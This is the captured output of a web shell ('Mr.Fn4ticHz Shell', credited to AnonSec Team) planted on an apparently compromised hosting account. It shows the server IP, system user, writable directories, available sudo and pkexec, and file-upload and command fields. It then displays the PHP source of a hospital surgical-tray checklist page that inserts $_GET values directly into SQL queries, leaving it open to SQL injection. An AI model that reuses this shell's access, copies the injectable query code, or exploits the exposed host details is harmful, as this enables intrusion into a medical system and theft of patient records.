Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.191.157.197
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/showpage_ortraychecklist.php
   <?php
     session_start();
     include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');

    include("../dbconnection.php");
		$sql2 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    
		   	include 'dashboarddocument.php';
}
?>
	  

  <?php

include 'fileheader.php';
?>
 <style>
                     
       .center {
   border: 1px solid grey;
   text-align:;
}
    .center2 {
   border: 5px solid grey;
   text-align:;
}
</style>
<h3 align='center'>Ortray Checklist</h3>
<?php
include("dbconnection.php");
	$sqlpatient = "SELECT * FROM save_activity WHERE  prescriptionid='$_GET[prescriptionid]' AND discription='Intial Assessment<br>Covid 19 Checklist<br>Doc.no-'";
	$qsqlpatient = mysqli_query($con,$sqlpatient);
	if($rsp = mysqli_fetch_array($qsqlpatient))
	{
	    if($rsp[discription]== 'Intial Assessment<br>Covid 19 Checklist<br>Doc.no-'){
	        echo"<h4>Doc.no : $rsp[srno]</h4>";

} else{
    echo "";
}
       
	}
		$sql2 ="SELECT * FROM surgerytracker WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND  surgeryid='$_GET[surgeryid]'";
		$qsql2 = mysqli_query($con,$sql2);
		while($rs2 = mysqli_fetch_array($qsql2))
		{

		    echo '<h4>Surgery Id :-'.$rs2[surgeryid].' / ';
		    
		    $sql1 ="SELECT * FROM list_tretment WHERE trid='$rs2[surgery]'";
		$qsql1 = mysqli_query($con,$sql1);
		while($re1 = mysqli_fetch_array($qsql1))
		{
		    echo $re1[tratment] .'</h4>';
		}
		}
?>
   <div class='center'>
       <table id='example2' class='table table-bordered table-hover'>
<?php 
		$sql ="SELECT * FROM ortray WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND  surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    echo "
 <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Sponege: </td>
<td width='50%'>$rs[sponege]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Sponge Holder  :  </td>
<td width='50%'>$rs[Sponge_Holder]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Gauge and Bandage  :  </td>
<td width='50%'>$rs[Gauge_and_Bandage]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Antiseptic  :  </td>
<td width='50%'>$rs[Antiseptic]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  BP Handle  :  </td>
<td width='50%'>$rs[BP_Handle]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Blade  :  </td>
<td width='50%'>$rs[Blade]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Bowl  :  </td>
<td width='50%'>$rs[Bowl]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Mop  :  </td>
<td width='50%'>$rs[Mop]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Towel  :  </td>
<td width='50%'>$rs[Towel]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Towel Clip  :  </td>
<td width='50%'>$rs[Towel_Clip]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Long Artery forceps  :  </td>
<td width='50%'>$rs[Long_forceps]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Small Artery Forceps  :  </td>
<td width='50%'>$rs[Small_Forceps]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Allis forceps  :  </td>
<td width='50%'>$rs[Allis_forceps]</td>
</tr>
V
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Mayo Scissors  :  </td>
<td width='50%'>$rs[Mayo_Scissors]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Suture Cutting scissors  :  </td>
<td width='50%'>$rs[Suture]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Cord Cutting scissors  :  </td>
<td width='50%'>$rs[Cutting]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Needle Holder  :  </td>
<td width='50%'>$rs[Needle_Holder]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Tooth Forceps  :  </td>
<td width='50%'>$rs[Tooth_Forceps]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Doyens Retractors  :  </td>
<td width='50%'>$rs[Doyens_Retractors]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Suction Tube  :  </td>
<td width='50%'>$rs[Suction_Tube]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Cautery pencil  :  </td>
<td width='50%'>$rs[Cautery_pencil]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Right angle Forceps  :  </td>
<td width='50%'>$rs[Right_angle_Forceps]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Tenaculum  :  </td>
<td width='50%'>$rs[Tenaculum]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Kocher’s Forceps  :  </td>
<td width='50%'>$rs[Kocher_Forceps]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Babcock  :  </td>
<td width='50%'>$rs[Babcock]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Absorb Suture V 2-0 90CM  :  </td>
<td width='50%'>$rs[Absorb_Suture]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Absorb Suture V-1 90CM  :  </td>
<td width='50%'>$rs[Suture_V1]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Absorb Suture V 2-0 90CM  :  </td>
<td width='50%'>$rs[Suture_V2]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Non Absorb Suture  :  </td>
<td width='50%'>$rs[Non_Absorb_Suture]</td>
</tr>
";
}
?>




				</table>
				
	
</div>
<?php

  	$sql11 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]' ";
		$qsql11 = mysqli_query($con,$sql11);
		while($rs11 = mysqli_fetch_array($qsql11))
		{
			$sql ="SELECT * FROM ortray WHERE prescriptionid='$rs11[prescriptionid]' AND patientid='$_GET[patientid]' AND surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{  
	    $sql1 ="SELECT * FROM site_users WHERE userno='$rs[entered_by]'";
		$qsql1 = mysqli_query($con,$sql1);
		while($rs1 = mysqli_fetch_array($qsql1))
		{
		    
		 echo"<h5><b> Created & Updated </b><h5>
		 <table id='example2' class='table table-bordered table-hover'>
		 <tr><td width=50%><b>By :</b>$rs1[name] </b><td width='50%'><b>At :</b> $rs11[created_at] </tr>";   
		    
		}
		}
	}
		?>
		</table>



Anon7 - 2022
AnonSec Team